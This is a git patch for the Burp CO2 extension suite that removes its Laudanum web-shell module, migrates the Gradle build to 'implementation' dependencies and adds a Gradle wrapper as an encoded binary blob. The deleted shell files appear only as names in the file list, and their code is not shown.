From 6b51e8227c597e3d04c28a3e2c9fd0a37e5ab28d Mon Sep 17 00:00:00 2001 From: jgillam Date: Sat, 17 Feb 2024 11:30:06 -0500 Subject: [PATCH 1/8] remove laudanum and update gradle build --- .gitignore | 4 + .idea/artifacts/BurpCO2Suite.xml | 21 - .idea/artifacts/SQLMapper.xml | 13 - .idea/artifacts/burp_laudanum.xml | 13 - build.gradle | 43 +- gradle/wrapper/gradle-wrapper.jar | Bin 0 -> 63375 bytes gradle/wrapper/gradle-wrapper.properties | 7 + gradlew | 248 +++++++++ gradlew.bat | 92 +++ modules/co2-laudanum/co2-laudanum.iml | 15 - .../co2/laudanum/asp/shell.asp | 120 ---- .../co2/laudanum/aspx/shell.aspx | 161 ------ .../co2/laudanum/java/shell.jsp | 93 ---- .../co2/laudanum/php/shell.php | 159 ------ .../co2-laudanum/src/burp/BurpExtender.java | 29 - .../co2/laudanum/ASPShellPayloadType.java | 38 -- .../co2/laudanum/ASPXShellPayloadType.java | 38 -- .../co2/laudanum/JSPShellPayloadType.java | 22 - .../co2/laudanum/LaudanumClient.form | 339 ----------- .../co2/laudanum/LaudanumClient.java | 524 ------------------ .../co2/laudanum/LaudanumCo2Extender.java | 73 --- .../co2/laudanum/LaudanumRequest.java | 80 --- .../co2/laudanum/LaudanumResponse.java | 64 --- .../co2/laudanum/PHPShellPayloadType.java | 25 - .../co2/laudanum/PayloadType.java | 55 -- .../co2/laudanum/WARShellPayloadType.java | 59 -- .../co2/Co2SuiteExtender.java | 6 +- settings.gradle | 2 +- 28 files changed, 367 insertions(+), 1976 deletions(-) delete mode 100644 .idea/artifacts/BurpCO2Suite.xml delete mode 100644 .idea/artifacts/SQLMapper.xml delete mode 100644 .idea/artifacts/burp_laudanum.xml create mode 100644 gradle/wrapper/gradle-wrapper.jar create mode 100644 gradle/wrapper/gradle-wrapper.properties create mode 100644 gradlew create mode 100644 gradlew.bat delete mode 100644 modules/co2-laudanum/co2-laudanum.iml delete mode 100644 modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/asp/shell.asp delete mode 100644 modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/aspx/shell.aspx delete mode 100644 modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/java/shell.jsp delete mode 100644 modules/co2-laudanum/resources/com/professionallyevil/co2/laudanum/php/shell.php delete mode 100644 modules/co2-laudanum/src/burp/BurpExtender.java delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/ASPShellPayloadType.java delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/ASPXShellPayloadType.java delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/JSPShellPayloadType.java delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumClient.form delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumClient.java delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumCo2Extender.java delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumRequest.java delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumResponse.java delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/PHPShellPayloadType.java delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/PayloadType.java delete mode 100644 modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/WARShellPayloadType.java diff --git a/.gitignore b/.gitignore index 67bcc2f..374f7b9 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,6 @@ .gradle/ build/ +modules/burp-api/burp/ +.idea/ + + diff --git a/.idea/artifacts/BurpCO2Suite.xml b/.idea/artifacts/BurpCO2Suite.xml deleted file mode 100644 index 3a72016..0000000 --- a/.idea/artifacts/BurpCO2Suite.xml +++ /dev/null @@ -1,21 +0,0 @@ - - - $PROJECT_DIR$/out/artifacts/BurpCO2Suite - - - file://$PROJECT_DIR$/modules/co2-suite/build.xml - init - - - - - - - - - - - - - - \ No newline at end of file diff --git a/.idea/artifacts/SQLMapper.xml b/.idea/artifacts/SQLMapper.xml deleted file mode 100644 index 1dfce2c..0000000 --- a/.idea/artifacts/SQLMapper.xml +++ /dev/null @@ -1,13 +0,0 @@ - - - $PROJECT_DIR$/out/artifacts/SQLMapper - - - - - - - - - - \ No newline at end of file diff --git a/.idea/artifacts/burp_laudanum.xml b/.idea/artifacts/burp_laudanum.xml deleted file mode 100644 index d184730..0000000 --- a/.idea/artifacts/burp_laudanum.xml +++ /dev/null @@ -1,13 +0,0 @@ - - - $PROJECT_DIR$/out/artifacts/burp_laudanum - - - - - - - - - - \ No newline at end of file diff --git a/build.gradle b/build.gradle index 5f7950a..dad75aa 100644 --- a/build.gradle +++ b/build.gradle @@ -13,35 +13,21 @@ allprojects { } dependencies { - compile 'net.portswigger.burp.extender:burp-extender-api:1.7.13' - compile project(':co2-suite') + implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13' + implementation project(':co2-suite') } project(':co2-core') { dependencies { - compile 'net.portswigger.burp.extender:burp-extender-api:1.7.13' - } -} - -project(':co2-laudanum') { - dependencies { - compile 'net.portswigger.burp.extender:burp-extender-api:1.7.13' - compile 'com.intellij:forms_rt:7.0.3' - compile project(':co2-core') - } - - task fatJar(type: Jar) { - archiveBaseName = project.name + '-all' - from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } } - with jar + implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13' } } project(':co2-sqlmapper') { dependencies { - compile 'net.portswigger.burp.extender:burp-extender-api:1.7.13' - compile 'com.intellij:forms_rt:7.0.3' - compile project(':co2-core') + implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13' + implementation 'com.intellij:forms_rt:7.0.3' + implementation project(':co2-core') } task fatJar(type: Jar) { @@ -53,9 +39,9 @@ project(':co2-sqlmapper') { project(':co2-cewler') { dependencies { - compile 'net.portswigger.burp.extender:burp-extender-api:1.7.13' - compile 'com.intellij:forms_rt:7.0.3' - compile project(':co2-core') + implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13' + implementation 'com.intellij:forms_rt:7.0.3' + implementation project(':co2-core') } task fatJar(type: Jar) { @@ -67,12 +53,11 @@ project(':co2-cewler') { project(':co2-suite') { dependencies { - compile 'net.portswigger.burp.extender:burp-extender-api:1.7.13' - compile project(':co2-core') - compile project(':co2-laudanum') - compile project(':co2-sqlmapper') - compile project(':co2-cewler') - compile project(':co2-core') + implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13' + implementation project(':co2-core') + implementation project(':co2-sqlmapper') + implementation project(':co2-cewler') + implementation project(':co2-core') } } diff --git a/gradle/wrapper/gradle-wrapper.jar b/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 0000000000000000000000000000000000000000..033e24c4cdf41af1ab109bc7f253b2b887023340 GIT binary patch literal 63375 zcmb5VV{~QRw)Y#`wrv{~+qP{x72B%VwzFc}c2cp;N~)5ZbDrJayPv(!dGEd-##*zr z)#n-$y^sH|_dchh3@8{H5D*j;5D<{i*8l5IFJ|DjL!e)upfGNX(kojugZ3I`oH1PvW`wFW_ske0j@lB9bX zO;2)`y+|!@X(fZ1<2n!Qx*)_^Ai@Cv-dF&(vnudG?0CsddG_&Wtae(n|K59ew)6St z#dj7_(Cfwzh$H$5M!$UDd8=4>IQsD3xV=lXUq($;(h*$0^yd+b{qq63f0r_de#!o_ zXDngc>zy`uor)4A^2M#U*DC~i+dc<)Tb1Tv&~Ev@oM)5iJ4Sn#8iRw16XXuV50BS7 zdBL5Mefch(&^{luE{*5qtCZk$oFr3RH=H!c3wGR=HJ(yKc_re_X9pD` zJ;uxPzUfVpgU>DSq?J;I@a+10l0ONXPcDkiYcihREt5~T5Gb}sT0+6Q;AWHl`S5dV>lv%-p9l#xNNy7ZCr%cyqHY%TZ8Q4 zbp&#ov1*$#grNG#1vgfFOLJCaNG@K|2!W&HSh@3@Y%T?3YI75bJp!VP*$*!< z;(ffNS_;@RJ`=c7yX04!u3JP*<8jeqLHVJu#WV&v6wA!OYJS4h<_}^QI&97-;=ojW zQ-1t)7wnxG*5I%U4)9$wlv5Fr;cIizft@&N+32O%B{R1POm$oap@&f| zh+5J{>U6ftv|vAeKGc|zC=kO(+l7_cLpV}-D#oUltScw})N>~JOZLU_0{Ka2e1evz z{^a*ZrLr+JUj;)K&u2CoCAXLC2=fVScI(m_p~0FmF>>&3DHziouln?;sxW`NB}cSX z8?IsJB)Z=aYRz!X=yJn$kyOWK%rCYf-YarNqKzmWu$ZvkP12b4qH zhS9Q>j<}(*frr?z<%9hl*i^#@*O2q(Z^CN)c2c z>1B~D;@YpG?G!Yk+*yn4vM4sO-_!&m6+`k|3zd;8DJnxsBYtI;W3We+FN@|tQ5EW= z!VU>jtim0Mw#iaT8t_<+qKIEB-WwE04lBd%Letbml9N!?SLrEG$nmn7&W(W`VB@5S zaY=sEw2}i@F_1P4OtEw?xj4@D6>_e=m=797#hg}f*l^`AB|Y0# z9=)o|%TZFCY$SzgSjS|8AI-%J4x}J)!IMxY3_KYze`_I=c1nmrk@E8c9?MVRu)7+Ue79|)rBX7tVB7U|w4*h(;Gi3D9le49B38`wuv zp7{4X^p+K4*$@gU(Tq3K1a#3SmYhvI42)GzG4f|u zwQFT1n_=n|jpi=70-yE9LA+d*T8u z`=VmmXJ_f6WmZveZPct$Cgu^~gFiyL>Lnpj*6ee>*0pz=t$IJ}+rE zsf@>jlcG%Wx;Cp5x)YSVvB1$yyY1l&o zvwX=D7k)Dn;ciX?Z)Pn8$flC8#m`nB&(8?RSdBvr?>T9?E$U3uIX7T?$v4dWCa46 z+&`ot8ZTEgp7G+c52oHJ8nw5}a^dwb_l%MOh(ebVj9>_koQP^$2B~eUfSbw9RY$_< z&DDWf2LW;b0ZDOaZ&2^i^g+5uTd;GwO(-bbo|P^;CNL-%?9mRmxEw~5&z=X^Rvbo^WJW=n_%*7974RY}JhFv46> zd}`2|qkd;89l}R;i~9T)V-Q%K)O=yfVKNM4Gbacc7AOd>#^&W&)Xx!Uy5!BHnp9kh z`a(7MO6+Ren#>R^D0K)1sE{Bv>}s6Rb9MT14u!(NpZOe-?4V=>qZ>}uS)!y~;jEUK z&!U7Fj&{WdgU#L0%bM}SYXRtM5z!6M+kgaMKt%3FkjWYh=#QUpt$XX1!*XkpSq-pl zhMe{muh#knk{9_V3%qdDcWDv}v)m4t9 zQhv{;} zc{}#V^N3H>9mFM8`i`0p+fN@GqX+kl|M94$BK3J-X`Hyj8r!#x6Vt(PXjn?N)qedP z=o1T^#?1^a{;bZ&x`U{f?}TMo8ToN zkHj5v|}r}wDEi7I@)Gj+S1aE-GdnLN+$hw!=DzglMaj#{qjXi_dwpr|HL(gcCXwGLEmi|{4&4#OZ4ChceA zKVd4K!D>_N=_X;{poT~4Q+!Le+ZV>=H7v1*l%w`|`Dx8{)McN@NDlQyln&N3@bFpV z_1w~O4EH3fF@IzJ9kDk@7@QctFq8FbkbaH7K$iX=bV~o#gfh?2JD6lZf(XP>~DACF)fGFt)X%-h1yY~MJU{nA5 ze2zxWMs{YdX3q5XU*9hOH0!_S24DOBA5usB+Ws$6{|AMe*joJ?RxfV}*7AKN9V*~J zK+OMcE@bTD>TG1*yc?*qGqjBN8mgg@h1cJLDv)0!WRPIkC` zZrWXrceVw;fB%3`6kq=a!pq|hFIsQ%ZSlo~)D z|64!aCnw-?>}AG|*iOl44KVf8@|joXi&|)1rB;EQWgm+iHfVbgllP$f!$Wf42%NO5b(j9Bw6L z;0dpUUK$5GX4QbMlTmLM_jJt!ur`_0~$b#BB7FL*%XFf<b__1o)Ao3rlobbN8-(T!1d-bR8D3S0@d zLI!*GMb5s~Q<&sjd}lBb8Nr0>PqE6_!3!2d(KAWFxa{hm`@u|a(%#i(#f8{BP2wbs zt+N_slWF4IF_O|{w`c~)Xvh&R{Au~CFmW#0+}MBd2~X}t9lz6*E7uAD`@EBDe$>7W zzPUkJx<`f$0VA$=>R57^(K^h86>09?>_@M(R4q($!Ck6GG@pnu-x*exAx1jOv|>KH zjNfG5pwm`E-=ydcb+3BJwuU;V&OS=6yM^4Jq{%AVqnTTLwV`AorIDD}T&jWr8pB&j28fVtk_y*JRP^t@l*($UZ z6(B^-PBNZ+z!p?+e8@$&jCv^EWLb$WO=}Scr$6SM*&~B95El~;W_0(Bvoha|uQ1T< zO$%_oLAwf1bW*rKWmlD+@CP&$ObiDy=nh1b2ejz%LO9937N{LDe7gle4i!{}I$;&Y zkexJ9Ybr+lrCmKWg&}p=`2&Gf10orS?4$VrzWidT=*6{KzOGMo?KI0>GL0{iFWc;C z+LPq%VH5g}6V@-tg2m{C!-$fapJ9y}c$U}aUmS{9#0CM*8pC|sfer!)nG7Ji>mfRh z+~6CxNb>6eWKMHBz-w2{mLLwdA7dA-qfTu^A2yG1+9s5k zcF=le_UPYG&q!t5Zd_*E_P3Cf5T6821bO`daa`;DODm8Ih8k89=RN;-asHIigj`n=ux>*f!OC5#;X5i;Q z+V!GUy0|&Y_*8k_QRUA8$lHP;GJ3UUD08P|ALknng|YY13)}!!HW@0z$q+kCH%xet zlWf@BXQ=b=4}QO5eNnN~CzWBbHGUivG=`&eWK}beuV*;?zt=P#pM*eTuy3 zP}c#}AXJ0OIaqXji78l;YrP4sQe#^pOqwZUiiN6^0RCd#D271XCbEKpk`HI0IsN^s zES7YtU#7=8gTn#lkrc~6)R9u&SX6*Jk4GFX7){E)WE?pT8a-%6P+zS6o&A#ml{$WX zABFz#i7`DDlo{34)oo?bOa4Z_lNH>n;f0nbt$JfAl~;4QY@}NH!X|A$KgMmEsd^&Y zt;pi=>AID7ROQfr;MsMtClr5b0)xo|fwhc=qk33wQ|}$@?{}qXcmECh>#kUQ-If0$ zseb{Wf4VFGLNc*Rax#P8ko*=`MwaR-DQ8L8V8r=2N{Gaips2_^cS|oC$+yScRo*uF zUO|5=?Q?{p$inDpx*t#Xyo6=s?bbN}y>NNVxj9NZCdtwRI70jxvm3!5R7yiWjREEd zDUjrsZhS|P&|Ng5r+f^kA6BNN#|Se}_GF>P6sy^e8kBrgMv3#vk%m}9PCwUWJg-AD zFnZ=}lbi*mN-AOm zCs)r=*YQAA!`e#1N>aHF=bb*z*hXH#Wl$z^o}x##ZrUc=kh%OHWhp=7;?8%Xj||@V?1c ziWoaC$^&04;A|T)!Zd9sUzE&$ODyJaBpvqsw19Uiuq{i#VK1!htkdRWBnb z`{rat=nHArT%^R>u#CjjCkw-7%g53|&7z-;X+ewb?OLWiV|#nuc8mp*LuGSi3IP<<*Wyo9GKV7l0Noa4Jr0g3p_$ z*R9{qn=?IXC#WU>48-k5V2Oc_>P;4_)J@bo1|pf=%Rcbgk=5m)CJZ`caHBTm3%!Z9 z_?7LHr_BXbKKr=JD!%?KhwdYSdu8XxPoA{n8^%_lh5cjRHuCY9Zlpz8g+$f@bw@0V z+6DRMT9c|>1^3D|$Vzc(C?M~iZurGH2pXPT%F!JSaAMdO%!5o0uc&iqHx?ImcX6fI zCApkzc~OOnfzAd_+-DcMp&AOQxE_EsMqKM{%dRMI5`5CT&%mQO?-@F6tE*xL?aEGZ z8^wH@wRl`Izx4sDmU>}Ym{ybUm@F83qqZPD6nFm?t?(7>h*?`fw)L3t*l%*iw0Qu#?$5eq!Qc zpQvqgSxrd83NsdO@lL6#{%lsYXWen~d3p4fGBb7&5xqNYJ)yn84!e1PmPo7ChVd%4 zHUsV0Mh?VpzZD=A6%)Qrd~i7 z96*RPbid;BN{Wh?adeD_p8YU``kOrGkNox3D9~!K?w>#kFz!4lzOWR}puS(DmfjJD z`x0z|qB33*^0mZdM&6$|+T>fq>M%yoy(BEjuh9L0>{P&XJ3enGpoQRx`v6$txXt#c z0#N?b5%srj(4xmPvJxrlF3H%OMB!jvfy z;wx8RzU~lb?h_}@V=bh6p8PSb-dG|-T#A?`c&H2`_!u+uenIZe`6f~A7r)`9m8atC zt(b|6Eg#!Q*DfRU=Ix`#B_dK)nnJ_+>Q<1d7W)eynaVn`FNuN~%B;uO2}vXr5^zi2 z!ifIF5@Zlo0^h~8+ixFBGqtweFc`C~JkSq}&*a3C}L?b5Mh-bW=e)({F_g4O3 zb@SFTK3VD9QuFgFnK4Ve_pXc3{S$=+Z;;4+;*{H}Rc;845rP?DLK6G5Y-xdUKkA6E3Dz&5f{F^FjJQ(NSpZ8q-_!L3LL@H* zxbDF{gd^U3uD;)a)sJwAVi}7@%pRM&?5IaUH%+m{E)DlA_$IA1=&jr{KrhD5q&lTC zAa3c)A(K!{#nOvenH6XrR-y>*4M#DpTTOGQEO5Jr6kni9pDW`rvY*fs|ItV;CVITh z=`rxcH2nEJpkQ^(;1c^hfb8vGN;{{oR=qNyKtR1;J>CByul*+=`NydWnSWJR#I2lN zTvgnR|MBx*XFsfdA&;tr^dYaqRZp*2NwkAZE6kV@1f{76e56eUmGrZ>MDId)oqSWw z7d&r3qfazg+W2?bT}F)4jD6sWaw`_fXZGY&wnGm$FRPFL$HzVTH^MYBHWGCOk-89y zA+n+Q6EVSSCpgC~%uHfvyg@ufE^#u?JH?<73A}jj5iILz4Qqk5$+^U(SX(-qv5agK znUkfpke(KDn~dU0>gdKqjTkVk`0`9^0n_wzXO7R!0Thd@S;U`y)VVP&mOd-2 z(hT(|$=>4FY;CBY9#_lB$;|Wd$aOMT5O_3}DYXEHn&Jrc3`2JiB`b6X@EUOD zVl0S{ijm65@n^19T3l%>*;F(?3r3s?zY{thc4%AD30CeL_4{8x6&cN}zN3fE+x<9; zt2j1RRVy5j22-8U8a6$pyT+<`f+x2l$fd_{qEp_bfxfzu>ORJsXaJn4>U6oNJ#|~p z`*ZC&NPXl&=vq2{Ne79AkQncuxvbOG+28*2wU$R=GOmns3W@HE%^r)Fu%Utj=r9t` zd;SVOnA(=MXgnOzI2@3SGKHz8HN~Vpx&!Ea+Df~`*n@8O=0!b4m?7cE^K*~@fqv9q zF*uk#1@6Re_<^9eElgJD!nTA@K9C732tV~;B`hzZ321Ph=^BH?zXddiu{Du5*IPg} zqDM=QxjT!Rp|#Bkp$(mL)aar)f(dOAXUiw81pX0DC|Y4;>Vz>>DMshoips^8Frdv} zlTD=cKa48M>dR<>(YlLPOW%rokJZNF2gp8fwc8b2sN+i6&-pHr?$rj|uFgktK@jg~ zIFS(%=r|QJ=$kvm_~@n=ai1lA{7Z}i+zj&yzY+!t$iGUy|9jH#&oTNJ;JW-3n>DF+ z3aCOzqn|$X-Olu_p7brzn`uk1F*N4@=b=m;S_C?#hy{&NE#3HkATrg?enaVGT^$qIjvgc61y!T$9<1B@?_ibtDZ{G zeXInVr5?OD_nS_O|CK3|RzzMmu+8!#Zb8Ik;rkIAR%6?$pN@d<0dKD2c@k2quB%s( zQL^<_EM6ow8F6^wJN1QcPOm|ehA+dP(!>IX=Euz5qqIq}Y3;ibQtJnkDmZ8c8=Cf3 zu`mJ!Q6wI7EblC5RvP*@)j?}W=WxwCvF3*5Up_`3*a~z$`wHwCy)2risye=1mSp%p zu+tD6NAK3o@)4VBsM!@);qgsjgB$kkCZhaimHg&+k69~drbvRTacWKH;YCK(!rC?8 zP#cK5JPHSw;V;{Yji=55X~S+)%(8fuz}O>*F3)hR;STU`z6T1aM#Wd+FP(M5*@T1P z^06O;I20Sk!bxW<-O;E081KRdHZrtsGJflFRRFS zdi5w9OVDGSL3 zNrC7GVsGN=b;YH9jp8Z2$^!K@h=r-xV(aEH@#JicPy;A0k1>g1g^XeR`YV2HfmqXY zYbRwaxHvf}OlCAwHoVI&QBLr5R|THf?nAevV-=~V8;gCsX>jndvNOcFA+DI+zbh~# zZ7`qNk&w+_+Yp!}j;OYxIfx_{f0-ONc?mHCiCUak=>j>~>YR4#w# zuKz~UhT!L~GfW^CPqG8Lg)&Rc6y^{%3H7iLa%^l}cw_8UuG;8nn9)kbPGXS}p3!L_ zd#9~5CrH8xtUd?{d2y^PJg+z(xIfRU;`}^=OlehGN2=?}9yH$4Rag}*+AWotyxfCJ zHx=r7ZH>j2kV?%7WTtp+-HMa0)_*DBBmC{sd$)np&GEJ__kEd`xB5a2A z*J+yx>4o#ZxwA{;NjhU*1KT~=ZK~GAA;KZHDyBNTaWQ1+;tOFFthnD)DrCn`DjBZ% zk$N5B4^$`n^jNSOr=t(zi8TN4fpaccsb`zOPD~iY=UEK$0Y70bG{idLx@IL)7^(pL z{??Bnu=lDeguDrd%qW1)H)H`9otsOL-f4bSu};o9OXybo6J!Lek`a4ff>*O)BDT_g z<6@SrI|C9klY(>_PfA^qai7A_)VNE4c^ZjFcE$Isp>`e5fLc)rg@8Q_d^Uk24$2bn z9#}6kZ2ZxS9sI(RqT7?El2@B+($>eBQrNi_k#CDJ8D9}8$mmm z4oSKO^F$i+NG)-HE$O6s1--6EzJa?C{x=QgK&c=)b(Q9OVoAXYEEH20G|q$}Hue%~ zO3B^bF=t7t48sN zWh_zA`w~|){-!^g?6Mqf6ieV zFx~aPUOJGR=4{KsW7I?<=J2|lY`NTU=lt=%JE9H1vBpkcn=uq(q~=?iBt_-r(PLBM zP-0dxljJO>4Wq-;stY)CLB4q`-r*T$!K2o}?E-w_i>3_aEbA^MB7P5piwt1dI-6o!qWCy0 ztYy!x9arGTS?kabkkyv*yxvsPQ7Vx)twkS6z2T@kZ|kb8yjm+^$|sEBmvACeqbz)RmxkkDQX-A*K!YFziuhwb|ym>C$}U|J)4y z$(z#)GH%uV6{ec%Zy~AhK|+GtG8u@c884Nq%w`O^wv2#A(&xH@c5M`Vjk*SR_tJnq z0trB#aY)!EKW_}{#L3lph5ow=@|D5LzJYUFD6 z7XnUeo_V0DVSIKMFD_T0AqAO|#VFDc7c?c-Q%#u00F%!_TW1@JVnsfvm@_9HKWflBOUD~)RL``-!P;(bCON_4eVdduMO>?IrQ__*zE@7(OX zUtfH@AX*53&xJW*Pu9zcqxGiM>xol0I~QL5B%Toog3Jlenc^WbVgeBvV8C8AX^Vj& z^I}H})B=VboO%q1;aU5ACMh{yK4J;xlMc`jCnZR^!~LDs_MP&8;dd@4LDWw~*>#OT zeZHwdQWS!tt5MJQI~cw|Ka^b4c|qyd_ly(+Ql2m&AAw^ zQeSXDOOH!!mAgzAp0z)DD>6Xo``b6QwzUV@w%h}Yo>)a|xRi$jGuHQhJVA%>)PUvK zBQ!l0hq<3VZ*RnrDODP)>&iS^wf64C;MGqDvx>|p;35%6(u+IHoNbK z;Gb;TneFo*`zUKS6kwF*&b!U8e5m4YAo03a_e^!5BP42+r)LFhEy?_7U1IR<; z^0v|DhCYMSj<-;MtY%R@Fg;9Kky^pz_t2nJfKWfh5Eu@_l{^ph%1z{jkg5jQrkvD< z#vdK!nku*RrH~TdN~`wDs;d>XY1PH?O<4^U4lmA|wUW{Crrv#r%N>7k#{Gc44Fr|t z@UZP}Y-TrAmnEZ39A*@6;ccsR>)$A)S>$-Cj!=x$rz7IvjHIPM(TB+JFf{ehuIvY$ zsDAwREg*%|=>Hw$`us~RP&3{QJg%}RjJKS^mC_!U;E5u>`X`jW$}P`Mf}?7G7FX#{ zE(9u1SO;3q@ZhDL9O({-RD+SqqPX)`0l5IQu4q)49TUTkxR(czeT}4`WV~pV*KY&i zAl3~X%D2cPVD^B43*~&f%+Op)wl<&|D{;=SZwImydWL6@_RJjxP2g)s=dH)u9Npki zs~z9A+3fj0l?yu4N0^4aC5x)Osnm0qrhz@?nwG_`h(71P znbIewljU%T*cC=~NJy|)#hT+lx#^5MuDDnkaMb*Efw9eThXo|*WOQzJ*#3dmRWm@! zfuSc@#kY{Um^gBc^_Xdxnl!n&y&}R4yAbK&RMc+P^Ti;YIUh|C+K1|=Z^{nZ}}rxH*v{xR!i%qO~o zTr`WDE@k$M9o0r4YUFFeQO7xCu_Zgy)==;fCJ94M_rLAv&~NhfvcLWCoaGg2ao~3e zBG?Ms9B+efMkp}7BhmISGWmJsKI@a8b}4lLI48oWKY|8?zuuNc$lt5Npr+p7a#sWu zh!@2nnLBVJK!$S~>r2-pN||^w|fY`CT{TFnJy`B|e5;=+_v4l8O-fkN&UQbA4NKTyntd zqK{xEKh}U{NHoQUf!M=2(&w+eef77VtYr;xs%^cPfKLObyOV_9q<(%76-J%vR>w9!us-0c-~Y?_EVS%v!* z15s2s3eTs$Osz$JayyH|5nPAIPEX=U;r&p;K14G<1)bvn@?bM5kC{am|C5%hyxv}a z(DeSKI5ZfZ1*%dl8frIX2?);R^^~LuDOpNpk-2R8U1w92HmG1m&|j&J{EK=|p$;f9 z7Rs5|jr4r8k5El&qcuM+YRlKny%t+1CgqEWO>3;BSRZi(LA3U%Jm{@{y+A+w(gzA< z7dBq6a1sEWa4cD0W7=Ld9z0H7RI^Z7vl(bfA;72j?SWCo`#5mVC$l1Q2--%V)-uN* z9ha*s-AdfbDZ8R8*fpwjzx=WvOtmSzGFjC#X)hD%Caeo^OWjS(3h|d9_*U)l%{Ab8 zfv$yoP{OuUl@$(-sEVNt{*=qi5P=lpxWVuz2?I7Dc%BRc+NGNw+323^ z5BXGfS71oP^%apUo(Y#xkxE)y?>BFzEBZ}UBbr~R4$%b7h3iZu3S(|A;&HqBR{nK& z$;GApNnz=kNO^FL&nYcfpB7Qg;hGJPsCW44CbkG1@l9pn0`~oKy5S777uH)l{irK!ru|X+;4&0D;VE*Ii|<3P zUx#xUqvZT5kVQxsF#~MwKnv7;1pR^0;PW@$@T7I?s`_rD1EGUdSA5Q(C<>5SzE!vw z;{L&kKFM-MO>hy#-8z`sdVx})^(Dc-dw;k-h*9O2_YZw}|9^y-|8RQ`BWJUJL(Cer zP5Z@fNc>pTXABbTRY-B5*MphpZv6#i802giwV&SkFCR zGMETyUm(KJbh+&$8X*RB#+{surjr;8^REEt`2&Dubw3$mx>|~B5IKZJ`s_6fw zKAZx9&PwBqW1Oz0r0A4GtnZd7XTKViX2%kPfv+^X3|_}RrQ2e3l=KG_VyY`H?I5&CS+lAX5HbA%TD9u6&s#v!G> zzW9n4J%d5ye7x0y`*{KZvqyXUfMEE^ZIffzI=Hh|3J}^yx7eL=s+TPH(Q2GT-sJ~3 zI463C{(ag7-hS1ETtU;_&+49ABt5!A7CwLwe z=SoA8mYZIQeU;9txI=zcQVbuO%q@E)JI+6Q!3lMc=Gbj(ASg-{V27u>z2e8n;Nc*pf}AqKz1D>p9G#QA+7mqqrEjGfw+85Uyh!=tTFTv3|O z+)-kFe_8FF_EkTw!YzwK^Hi^_dV5x-Ob*UWmD-})qKj9@aE8g240nUh=g|j28^?v7 zHRTBo{0KGaWBbyX2+lx$wgXW{3aUab6Bhm1G1{jTC7ota*JM6t+qy)c5<@ zpc&(jVdTJf(q3xB=JotgF$X>cxh7k*(T`-V~AR+`%e?YOeALQ2Qud( zz35YizXt(aW3qndR}fTw1p()Ol4t!D1pitGNL95{SX4ywzh0SF;=!wf=?Q?_h6!f* zh7<+GFi)q|XBsvXZ^qVCY$LUa{5?!CgwY?EG;*)0ceFe&=A;!~o`ae}Z+6me#^sv- z1F6=WNd6>M(~ z+092z>?Clrcp)lYNQl9jN-JF6n&Y0mp7|I0dpPx+4*RRK+VQI~>en0Dc;Zfl+x z_e_b7s`t1_A`RP3$H}y7F9_na%D7EM+**G_Z0l_nwE+&d_kc35n$Fxkd4r=ltRZhh zr9zER8>j(EdV&Jgh(+i}ltESBK62m0nGH6tCBr90!4)-`HeBmz54p~QP#dsu%nb~W z7sS|(Iydi>C@6ZM(Us!jyIiszMkd)^u<1D+R@~O>HqZIW&kearPWmT>63%_t2B{_G zX{&a(gOYJx!Hq=!T$RZ&<8LDnxsmx9+TBL0gTk$|vz9O5GkK_Yx+55^R=2g!K}NJ3 zW?C;XQCHZl7H`K5^BF!Q5X2^Mj93&0l_O3Ea3!Ave|ixx+~bS@Iv18v2ctpSt4zO{ zp#7pj!AtDmti$T`e9{s^jf(ku&E|83JIJO5Qo9weT6g?@vX!{7)cNwymo1+u(YQ94 zopuz-L@|5=h8A!(g-MXgLJC0MA|CgQF8qlonnu#j z;uCeq9ny9QSD|p)9sp3ebgY3rk#y0DA(SHdh$DUm^?GI<>%e1?&}w(b zdip1;P2Z=1wM+$q=TgLP$}svd!vk+BZ@h<^4R=GS2+sri7Z*2f`9 z5_?i)xj?m#pSVchk-SR!2&uNhzEi+#5t1Z$o0PoLGz*pT64%+|Wa+rd5Z}60(j?X= z{NLjtgRb|W?CUADqOS@(*MA-l|E342NxRaxLTDqsOyfWWe%N(jjBh}G zm7WPel6jXijaTiNita+z(5GCO0NM=Melxud57PP^d_U## zbA;9iVi<@wr0DGB8=T9Ab#2K_#zi=$igyK48@;V|W`fg~7;+!q8)aCOo{HA@vpSy-4`^!ze6-~8|QE||hC{ICKllG9fbg_Y7v z$jn{00!ob3!@~-Z%!rSZ0JO#@>|3k10mLK0JRKP-Cc8UYFu>z93=Ab-r^oL2 zl`-&VBh#=-?{l1TatC;VweM^=M7-DUE>m+xO7Xi6vTEsReyLs8KJ+2GZ&rxw$d4IT zPXy6pu^4#e;;ZTsgmG+ZPx>piodegkx2n0}SM77+Y*j^~ICvp#2wj^BuqRY*&cjmL zcKp78aZt>e{3YBb4!J_2|K~A`lN=u&5j!byw`1itV(+Q_?RvV7&Z5XS1HF)L2v6ji z&kOEPmv+k_lSXb{$)of~(BkO^py&7oOzpjdG>vI1kcm_oPFHy38%D4&A4h_CSo#lX z2#oqMCTEP7UvUR3mwkPxbl8AMW(e{ARi@HCYLPSHE^L<1I}OgZD{I#YH#GKnpRmW3 z2jkz~Sa(D)f?V?$gNi?6)Y;Sm{&?~2p=0&BUl_(@hYeX8YjaRO=IqO7neK0RsSNdYjD 